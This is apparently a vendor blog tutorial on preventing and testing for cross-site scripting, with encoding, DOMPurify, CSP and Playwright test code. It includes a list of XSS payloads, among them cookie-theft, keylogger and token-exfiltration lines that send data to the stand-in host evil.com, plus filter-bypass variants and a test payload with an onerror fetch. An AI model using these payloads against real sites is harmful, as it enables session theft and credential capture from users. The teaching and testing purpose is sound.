
XSS Prevention and Testing: Close the OWASP Injection Vulnerability Attackers Count On

A malicious script injected into your application executes in thousands of user browsers, stealing sessions, credentials, and sensitive data. XSS remains one of the most common web vulnerabilities. Learn how to prevent, detect, and test for all types of XSS attacks.

11 min read

A user submits a comment: <script>fetch('https://evil.com?cookie='+document.cookie)</script>

Your application stores it in the database. Renders it on the page. Every visitor's session cookie is now sent to an attacker's server. Game over.

This is XSS (Cross-Site Scripting), and it has appeared in the OWASP Top 10 in every edition for over 20 years (since 2021, folded into the broader Injection category).

Despite decades of awareness, XSS remains pervasive. Commonly cited industry estimates:

  • Roughly 30% of web applications contain at least one XSS vulnerability
  • Around 60% of attacks involve XSS somewhere in the kill chain
  • Data breaches involving XSS cost an average of roughly $390k

Why is it still common? Because XSS has many forms, appears in unexpected places, and developers often misunderstand sanitization.
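One common misunderstanding: a blacklist filter that strips script tags is enough. A minimal sketch (the filter below is a deliberately naive illustration, not any real library) shows how a nested payload survives a single-pass strip:

```typescript
// Naive blacklist filter: strips "<script>" and "</script>" in one pass
function naiveSanitize(input: string): string {
  return input.replace(/<script>/gi, '').replace(/<\/script>/gi, '');
}

// Nested payload: removing the inner tags reassembles the outer ones,
// because String.replace does not re-scan its own output
const payload = '<scr<script>ipt>alert(1)</scr</script>ipt>';
console.log(naiveSanitize(payload)); // '<script>alert(1)</script>'
```

The filter rebuilt the exact attack it was meant to block. This is why the answer is context-aware output encoding and vetted sanitization libraries, not ad-hoc string filtering.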

This guide shows you how to prevent, detect, and test for all types of XSS vulnerabilities systematically.

Understanding XSS Types

graph TD
    A[XSS Types] --> B[Reflected XSS]
    A --> C[Stored XSS]
    A --> D[DOM-based XSS]

    B --> B1[URL Parameter]
    B --> B2[Search Query]
    B --> B3[Error Message]

    C --> C1[User Comments]
    C --> C2[Profile Data]
    C --> C3[File Upload Names]

    D --> D1[JavaScript eval]
    D --> D2[innerHTML]
    D --> D3[document.write]

    style A fill:#bbdefb
    style B fill:#fff9c4
    style C fill:#ffccbc
    style D fill:#f8bbd0

XSS Type Comparison

| Type | Stored on Server | Execution | Severity | Example |
|---|---|---|---|---|
| Reflected | ❌ No | Immediate (URL) | High | ?search=<script>alert(1)</script> |
| Stored | ✅ Yes | On page load | Critical | Comment with <script> tag |
| DOM-based | ❌ No | Client-side JS | High | location.hash used in innerHTML |

XSS Attack Vectors

// Common XSS payloads testers should know

const xssPayloads = {
  // Basic script injection
  basic: '<script>alert(document.cookie)</script>',

  // Event handler injection
  eventHandler: '<img src=x onerror="alert(1)">',

  // SVG injection
  svg: '<svg onload="alert(1)">',

  // JavaScript protocol
  jsProtocol: '<a href="javascript:alert(1)">Click</a>',

  // Data URI
  dataUri: '<iframe src="data:text/html,<script>alert(1)</script>"></iframe>',

  // Template injection (Angular)
  angular: '{{constructor.constructor("alert(1)")()}}',

  // Bypassing filters
  bypassSpace: '<img/src=x/onerror=alert(1)>',
  bypassQuotes: '<img src=x onerror=alert(1)>',
  bypassCase: '<ScRiPt>alert(1)</ScRiPt>',

  // Encoded payloads
  htmlEntity: '&lt;script&gt;alert(1)&lt;/script&gt;',
  url: '%3Cscript%3Ealert(1)%3C/script%3E',

  // Cookie stealing
  cookieTheft: '<script>new Image().src="https://evil.com?c="+document.cookie</script>',

  // Keylogger
  keylogger: '<script>document.onkeypress=e=>fetch("https://evil.com?k="+e.key)</script>',

  // Session hijacking
  hijack: '<script>fetch("https://evil.com",{method:"POST",body:localStorage.getItem("token")})</script>',
};
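A quick sanity check before aiming these payloads at an application: run a few through an HTML entity encoder (a minimal stand-in for the full, context-aware encoders in the next section) and confirm no raw angle brackets survive:

```typescript
// Minimal HTML entity encoder (stand-in for the context-aware encoders below)
const encodeHTML = (s: string): string =>
  s.replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' } as Record<string, string>)[c]
  );

const samples = [
  '<script>alert(document.cookie)</script>',
  '<img src=x onerror="alert(1)">',
  '<svg onload="alert(1)">',
];

for (const payload of samples) {
  const encoded = encodeHTML(payload);
  // After encoding, no raw markup characters remain to form tags
  if (/[<>]/.test(encoded)) throw new Error(`payload survived encoding: ${payload}`);
  console.log(encoded);
}
```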

Prevention Strategies

1. Output Encoding (Server-Side)

// xss-prevention.ts

/**
 * Context-aware output encoding
 */
class XSSPrevention {
  /**
   * HTML context encoding
   */
  static encodeHTML(input: string): string {
    return input
      .replace(/&/g, '&amp;')
      .replace(/</g, '&lt;')
      .replace(/>/g, '&gt;')
      .replace(/"/g, '&quot;')
      .replace(/'/g, '&#x27;')
      .replace(/\//g, '&#x2F;');
  }

  /**
   * JavaScript context encoding
   */
  static encodeJS(input: string): string {
    return input
      .replace(/\\/g, '\\\\')
      .replace(/'/g, "\\'")
      .replace(/"/g, '\\"')
      .replace(/\n/g, '\\n')
      .replace(/\r/g, '\\r')
      .replace(/\t/g, '\\t')
      .replace(/</g, '\\x3C')
      .replace(/>/g, '\\x3E');
  }

  /**
   * URL context encoding
   */
  static encodeURL(input: string): string {
    return encodeURIComponent(input);
  }

  /**
   * CSS context encoding
   */
  static encodeCSS(input: string): string {
    return input.replace(/[^a-zA-Z0-9]/g, (match) => {
      return '\\' + match.charCodeAt(0).toString(16) + ' ';
    });
  }

  /**
   * Attribute context encoding
   */
  static encodeAttribute(input: string): string {
    return input
      .replace(/&/g, '&amp;')
      .replace(/</g, '&lt;')
      .replace(/>/g, '&gt;')
      .replace(/"/g, '&quot;')
      .replace(/'/g, '&#x27;');
  }
}

// Usage examples
class UserProfileComponent {
  render(user: { name: string; bio: string; website: string }) {
    return `
      <div class="profile">
        <!-- HTML context: encode HTML entities -->
        <h1>${XSSPrevention.encodeHTML(user.name)}</h1>
        
        <!-- Attribute context: encode for attribute -->
        <img src="/avatars/default.jpg" alt="${XSSPrevention.encodeAttribute(user.name)}">
        
        <!-- URL context: encode for URL -->
        <a href="${XSSPrevention.encodeURL(user.website)}">Website</a>
        
        <!-- JavaScript context: encode for JS -->
        <script>
          const userName = '${XSSPrevention.encodeJS(user.name)}';
          console.log('User:', userName);
        </script>
        
        <!-- Rich text (needs sanitization, not just encoding) -->
        <div class="bio">${this.sanitizeHTML(user.bio)}</div>
      </div>
    `;
  }

  private sanitizeHTML(html: string): string {
    // Rich text must go through a vetted library such as DOMPurify (next section);
    // encoding alone would destroy the markup, and hand-rolled regexes are unsafe
    return html; // Placeholder: wire up DOMPurify here
  }
}

2. Input Sanitization

// input-sanitizer.ts
import DOMPurify from 'isomorphic-dompurify';

interface SanitizationOptions {
  allowedTags?: string[];
  allowedAttributes?: string[];
  allowedSchemes?: string[];
}

class InputSanitizer {
  /**
   * Sanitize HTML content (for rich text editors)
   */
  static sanitizeHTML(html: string, options: SanitizationOptions = {}): string {
    const config = {
      ALLOWED_TAGS: options.allowedTags || [
        'p', 'br', 'strong', 'em', 'u',
        'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
        'ul', 'ol', 'li', 'blockquote',
        'code', 'pre', 'a', 'img',
      ],
      // DOMPurify expects a flat attribute allowlist, not a per-tag map
      ALLOWED_ATTR: options.allowedAttributes || ['href', 'title', 'target', 'src', 'alt', 'width', 'height'],
      ALLOWED_URI_REGEXP: /^(?:(?:https?|mailto|tel):|[^a-z]|[a-z+.-]+(?:[^a-z+.\-:]|$))/i,
    };

    return DOMPurify.sanitize(html, config);
  }

  /**
   * Strip all HTML tags (for plain text fields)
   */
  static stripHTML(input: string): string {
    return input.replace(/<[^>]*>/g, '');
  }

  /**
   * Sanitize URL (prevent javascript: and other dangerous protocols)
   */
  static sanitizeURL(url: string): string {
    let urlObj: URL;
    try {
      urlObj = new URL(url);
    } catch {
      return ''; // Reject relative or malformed URLs
    }

    // Only allow safe protocols
    const safeProtocols = ['http:', 'https:', 'mailto:', 'tel:'];
    if (!safeProtocols.includes(urlObj.protocol)) {
      return ''; // Reject dangerous protocols such as javascript: and data:
    }

    return urlObj.href;
  }

  /**
   * Validate and sanitize filename
   */
  static sanitizeFilename(filename: string): string {
    return filename
      .replace(/[^a-zA-Z0-9._-]/g, '_') // Replace unsafe characters
      .replace(/\.{2,}/g, '.') // Prevent directory traversal
      .substring(0, 255); // Limit length
  }
}

// Express middleware example
import { Request, Response, NextFunction } from 'express';

function sanitizeInputs(req: Request, res: Response, next: NextFunction) {
  // Sanitize all string inputs
  const sanitize = (obj: any): any => {
    if (typeof obj === 'string') {
      return InputSanitizer.stripHTML(obj);
    } else if (Array.isArray(obj)) {
      return obj.map(sanitize);
    } else if (obj && typeof obj === 'object') {
      return Object.fromEntries(Object.entries(obj).map(([key, value]) => [key, sanitize(value)]));
    }
    return obj;
  };

  req.body = sanitize(req.body);
  req.query = sanitize(req.query);
  req.params = sanitize(req.params);

  next();
}
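Note that the middleware above leans on stripHTML, which is a blunt, regex-based strip: it removes tag markup but keeps inner text, so it suits plain-text fields only (rich text needs sanitizeHTML). A quick check of the same regex shows its behavior, including an edge case worth knowing:

```typescript
// Same regex as InputSanitizer.stripHTML: removes anything that looks like a complete tag
const stripHTML = (input: string): string => input.replace(/<[^>]*>/g, '');

console.log(stripHTML('<b>hello</b>'));              // 'hello'
console.log(stripHTML('<script>alert(1)</script>')); // 'alert(1)'  (script body survives as text)
console.log(stripHTML('<img src=x onerror=alert(1)'));
// unchanged: no closing '>' means nothing matched, so the partial tag passes through
```

That last case matters: a partial tag that passes through and is later concatenated with more markup can become live HTML, which is why defense in depth (output encoding plus CSP) is still required behind any input filter.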

3. Content Security Policy (CSP)

// csp-middleware.ts
import crypto from 'crypto';
import { Request, Response, NextFunction } from 'express';

/**
 * Content Security Policy: one of the strongest defenses against XSS
 */
function cspMiddleware(req: Request, res: Response, next: NextFunction) {
  // Generate a fresh nonce per request for inline scripts
  const nonce = crypto.randomBytes(16).toString('base64');
  res.locals.cspNonce = nonce;

  const csp = [
    "default-src 'self'", // Only load resources from same origin
    `script-src 'self' 'nonce-${nonce}' https://cdn.example.com`, // Scripts only from self, with nonce, or CDN
    "style-src 'self' 'unsafe-inline' https://fonts.googleapis.com", // Styles (unsafe-inline needed for some frameworks)
    "img-src 'self' data: https:", // Images from self, data URIs, or HTTPS
    "font-src 'self' https://fonts.gstatic.com", // Fonts
    "connect-src 'self' https://api.example.com", // AJAX/fetch only to API
    "frame-ancestors 'none'", // Prevent clickjacking
    "base-uri 'self'", // Restrict <base> tag
    "form-action 'self'", // Forms can only submit to same origin
    'upgrade-insecure-requests', // Upgrade HTTP to HTTPS
  ].join('; ');

  res.setHeader('Content-Security-Policy', csp);

  // Report-only mode for testing
  // res.setHeader('Content-Security-Policy-Report-Only', csp);

  next();
}

// HTML template with CSP nonce
function renderPage(content: string, nonce: string) {
  return `
    <!DOCTYPE html>
    <html>
    <head>
      <meta charset="UTF-8">
      <!-- CSP nonce for inline scripts -->
      <script nonce="${nonce}">
        // This inline script is allowed
        console.log('Page loaded');
      </script>
    </head>
    <body>
      ${content}
      
      <!-- This will be blocked (no nonce) -->
      <!-- <script>alert('XSS')</script> -->
    </body>
    </html>
  `;
}

4. Framework-Specific Protection

// React (automatic XSS protection)
function UserProfile({ user }: { user: User }) {
  // React automatically escapes {} expressions
  return (
    <div>
      <h1>{user.name}</h1> {/* Safe: automatically escaped */}

      {/* DANGEROUS: never use dangerouslySetInnerHTML with user input */}
      <div dangerouslySetInnerHTML={{ __html: user.bio }} /> {/* ⚠️ XSS risk! */}

      {/* SAFE: Use sanitization library */}
      <div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(user.bio) }} />
    </div>
  );
}

// Vue (automatic XSS protection)
// <template>
//   <!-- Safe: automatically escaped -->
//   <h1>{{ user.name }}</h1>
//
//   <!-- DANGEROUS: v-html with user input -->
//   <div v-html="user.bio"></div> <!-- ⚠️ XSS risk! -->
//
//   <!-- SAFE: Use sanitization -->
//   <div v-html="sanitize(user.bio)"></div>
// </template>

// Angular (automatic XSS protection)
// @Component({
//   template: `
//     <!-- Safe: automatically escaped -->
//     <h1>{{user.name}}</h1>
//
//     <!-- DANGEROUS: bypass security -->
//     <div [innerHTML]="user.bio"></div> <!-- ⚠️ XSS risk! -->
//
//     <!-- SAFE: Use DomSanitizer -->
//     <div [innerHTML]="sanitizedBio"></div>
//   `
// })

Automated XSS Testing

1. Reflected XSS Testing

// xss-testing.ts
import { test, expect } from '@playwright/test';

test.describe('Reflected XSS Tests', () => {
  const xssPayloads = [
    '<script>alert(1)</script>',
    '<img src=x onerror=alert(1)>',
    '<svg onload=alert(1)>',
    'javascript:alert(1)',
    '<iframe src="javascript:alert(1)">',
    '<body onload=alert(1)>',
  ];

  test('search parameter should not execute scripts', async ({ page }) => {
    // Register the dialog listener first, so any alert() fails the test
    page.on('dialog', (dialog) => {
      throw new Error(`XSS executed! Dialog: ${dialog.message()}`);
    });

    for (const payload of xssPayloads) {
      await page.goto(`/search?q=${encodeURIComponent(payload)}`);

      // Check that the payload is rendered as text, not live markup
      const html = await page.content();
      expect(html).not.toContain('<script>alert(1)</script>');

      if (payload.includes('<')) {
        // Markup payloads must be escaped; page.content() serializes escaped
        // text nodes back as entities, so the raw payload must not appear
        expect(html).not.toContain(payload);
      }
    }
  });

  test('error messages should not execute scripts', async ({ page }) => {
    await page.goto(`/login?error=${encodeURIComponent('<script>alert(1)</script>')}`);

    // Check innerHTML, not textContent: a safe app renders the payload as
    // escaped text, so textContent would legitimately contain "<script>"
    const errorHTML = await page.locator('.error-message').innerHTML();
    expect(errorHTML).not.toMatch(/<script>/i);
  });

  test('URL parameters in attributes should be safe', async ({ page }) => {
    const payload = '"><script>alert(1)</script><a href="';
    await page.goto(`/profile?redirect=${encodeURIComponent(payload)}`);

    // Check all link hrefs
    const links = await page.locator('a').all();
    for (const link of links) {
      const href = await link.getAttribute('href');
      expect(href).not.toContain('<script>');
    }
  });
});

2. Stored XSS Testing

// stored-xss-test.ts

test.describe('Stored XSS Tests', () => {
  test('comment submission should sanitize HTML', async ({ page, request }) => {
    const xssPayload = '<script>alert(document.cookie)</script>';

    // Submit comment with XSS payload
    await request.post('/api/comments', {
      data: {
        postId: 1,
        content: xssPayload,
      },
    });

    // XSS should NOT execute: register the listener before loading the page
    page.on('dialog', () => {
      throw new Error('Stored XSS executed!');
    });

    // Load page displaying comments
    await page.goto('/posts/1');

    // Payload should be escaped in HTML
    const commentHTML = await page.locator('.comment').first().innerHTML();
    expect(commentHTML).not.toContain('<script>');
    expect(commentHTML).toContain('&lt;script&gt;');
  });

  test('user profile bio should sanitize rich text', async ({ page, request }) => {
    const maliciousBio = `
      <p>Hello!</p>
      <img src=x onerror="fetch('https://evil.com?cookie='+document.cookie)">
      <script>alert(1)</script>
    `;

    // Update profile with malicious bio
    await request.put('/api/users/me', {
      data: { bio: maliciousBio },
    });

    // View profile
    await page.goto('/profile');

    // Check what's rendered
    const bioHTML = await page.locator('.bio').innerHTML();

    // Allowed tags should remain
    expect(bioHTML).toContain('<p>Hello!</p>');

    // Dangerous tags should be removed
    expect(bioHTML).not.toContain('<script>');
    expect(bioHTML).not.toContain('onerror=');
  });
});

3. DOM-based XSS Testing

// dom-xss-test.ts

test.describe('DOM-based XSS Tests', () => {
  test('URL hash should not execute in innerHTML', async ({ page }) => {
    // Monitor for alert dialogs (XSS execution) before navigating,
    // so a dialog fired during page load is not missed
    let xssTriggered = false;
    page.on('dialog', async (dialog) => {
      xssTriggered = true;
      await dialog.dismiss();
    });

    // Navigate with XSS payload in hash
    await page.goto('/dashboard#<img src=x onerror=alert(1)>');

    await page.waitForTimeout(1000);

    expect(xssTriggered).toBe(false);
  });

  test('URL fragment used in eval should be safe', async ({ page }) => {
    page.on('dialog', () => {
      throw new Error('DOM XSS via eval()!');
    });

    // Test whether the app passes URL data through eval()
    await page.goto('/calculator#1+alert(1)');

    await page.waitForTimeout(1000);
  });
});
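The same sink can also be tested at unit level, without a browser. A hedged sketch, assuming a hypothetical renderHash helper that escapes fragment data before it ever reaches innerHTML:

```typescript
// Minimal HTML escaper
const escapeHTML = (s: string): string =>
  s.replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' } as Record<string, string>)[c]
  );

// Hypothetical helper: prepares location.hash for safe insertion into the DOM
function renderHash(hash: string): string {
  return escapeHTML(decodeURIComponent(hash.replace(/^#/, '')));
}

console.log(renderHash('#<img src=x onerror=alert(1)>'));
// '&lt;img src=x onerror=alert(1)&gt;'  (renders as inert text even via innerHTML)
```

Unit tests like this run in milliseconds and catch the encoding regression; the Playwright tests above then confirm the helper is actually used on the page.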

4. Automated Scanner Integration

#!/bin/bash
# Using OWASP ZAP for XSS scanning

# Start ZAP in daemon mode (API key disabled: local scanning only)
docker run -d --name zap -p 8080:8080 owasp/zap2docker-stable zap.sh -daemon -port 8080 -host 0.0.0.0 -config api.disablekey=true

# Spider the application
curl "http://localhost:8080/JSON/spider/action/scan/?url=http://app:3000"

# Run active scan with XSS focus
curl "http://localhost:8080/JSON/ascan/action/scan/?url=http://app:3000&scanPolicyName=XSS"

# Wait for scan completion (jq -r strips the JSON quotes so the comparison works)
while [ "$(curl -s "http://localhost:8080/JSON/ascan/view/status/" | jq -r '.status')" != "100" ]; do
  sleep 5
done

# Get XSS alerts (40012: reflected, 40014: persistent, 40016: persistent prime)
curl "http://localhost:8080/JSON/alert/view/alerts/" | jq '.alerts[] | select(.pluginId == "40012" or .pluginId == "40014" or .pluginId == "40016")'

XSS Testing Checklist

| Input Type | Test Method | Pass Criteria |
|---|---|---|
| Text inputs | Submit XSS payloads | Encoded, not executed |
| Rich text editors | HTML payloads | Sanitized (allowed tags only) |
| URL parameters | Reflected payloads | Escaped in HTML/attributes |
| File uploads | Malicious filenames | Sanitized filenames |
| JSON API | Script in JSON | Escaped when rendered |
| Error messages | Payload in error context | Encoded output |
| Headers | XSS in User-Agent/Referer | Not reflected unsafely |

Conclusion

XSS is preventable with a layered defense:

  1. Output encoding (context-aware)
  2. Input sanitization (DOMPurify for HTML)
  3. Content Security Policy (blocks inline scripts)
  4. Framework protection (React/Vue/Angular escape by default)
  5. Automated testing (catch regressions)

Key takeaways:

  • Encode all user input based on context (HTML/JS/CSS/URL/attribute)
  • Use CSP to block inline scripts and unsafe-eval
  • Sanitize HTML with DOMPurify, never roll your own
  • Test systematically: reflected, stored, and DOM-based XSS
  • Never trust user input, even from authenticated users

Start securing your application today:

  1. Implement CSP headers
  2. Add DOMPurify for rich text
  3. Write XSS tests for all user inputs
  4. Run automated XSS scanning in CI/CD
  5. Monitor CSP violation reports
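For step 5, CSP violation reports arrive as JSON that the browser POSTs to the endpoint named in the report-uri directive. A minimal sketch of parsing one, using the standard csp-report fields; the one-line summary format is our own choice:

```typescript
// Shape of the browser-sent report body (report-uri directive)
interface CSPReportBody {
  'csp-report': {
    'document-uri': string;
    'violated-directive': string;
    'blocked-uri': string;
  };
}

// Turn a raw report body into a one-line summary for logging/alerting
function summarizeCSPReport(rawBody: string): string {
  const report = (JSON.parse(rawBody) as CSPReportBody)['csp-report'];
  return `${report['violated-directive']} blocked ${report['blocked-uri']} on ${report['document-uri']}`;
}

const sample = JSON.stringify({
  'csp-report': {
    'document-uri': 'https://app.example.com/posts/1',
    'violated-directive': "script-src 'self'",
    'blocked-uri': 'https://evil.com/steal.js',
  },
});

console.log(summarizeCSPReport(sample));
// "script-src 'self' blocked https://evil.com/steal.js on https://app.example.com/posts/1"
```

A spike of script-src violations pointing at an unfamiliar origin is often the first visible signal of a stored XSS payload that slipped past sanitization.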

XSS is 20 years old, but still dangerous. Don't be the next breach headline.

Ready to automate XSS testing? Sign up for ScanlyApp and integrate security testing into your development workflow.

Related articles: see OWASP's full classification of injection and XSS vulnerabilities, the broader security testing program that XSS prevention belongs to, and API-layer security testing, where XSS payloads are often injected.
